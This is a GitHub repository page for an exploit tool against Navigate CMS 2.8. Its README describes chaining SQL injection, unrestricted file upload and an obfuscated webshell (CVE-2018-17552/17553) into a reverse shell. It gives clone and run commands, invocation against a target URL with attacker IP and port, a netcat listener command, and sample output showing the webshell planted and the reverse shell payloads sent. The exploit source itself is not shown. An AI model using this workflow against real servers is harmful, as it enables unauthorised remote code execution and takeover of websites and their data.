Skip to content

adrianmafandy/Navigate-CMS-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 

Repository files navigation

Navigate CMS 2.8 Remote Code Execution Exploit

Security Platform Language

A proof-of-concept exploit for Navigate CMS 2.8 that demonstrates a remote code execution vulnerability leading to reverse shell access.

πŸ“– Overview

This exploit demonstrates CVE 2018-17552 and CVE 2018-17553 vulnerability chain in Navigate CMS version 2.8, featuring:

  • SQL Injection in authentication mechanism
  • Unrestricted File Upload vulnerability
  • Remote Code Execution via obfuscated webshell
  • Multiple Reverse Shell payload delivery methods

πŸ“¦ Installation

# Clone the repository
git clone https://github.com/adrianmafandy/Navigate-CMS-RCE.git
cd Navigate-CMS-RCE

# Make the script executable
chmod +x navigate_rce.sh

πŸš€ Usage

Basic Syntax:

./navigate_rce.sh <target_url> <your_ip> <your_port>

Example:

./navigate_rce.sh http://victim.com 192.168.1.100 1337

Start a netcat listener before running the exploit:

nc -lvnp 1337

Expected Output:

 ______
(_____ \
 _____) ) _ _ ____   ____ ___   ____
|  ____/ | | |  _ \ / ___) _ \ / _  |
| |    | | | | | | | |  | |_| ( (_| |
|_|     \___/|_| |_|_|   \___/ \___ |
                              (_____|
   Navigate CMS 2.8 RCE by dr14n

[*] Getting session...
[+] Session: abcdefvckyou
[*] Creating webshell...
[*] Uploading webshell...
[*] Verifying webshell...
[+] Webshell active: http://victim.com/navigate/navigate_info.php
[*] Sending reverse shell payloads...
[+] Reverse shell payloads sent!
[+] Check your listener for connections

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages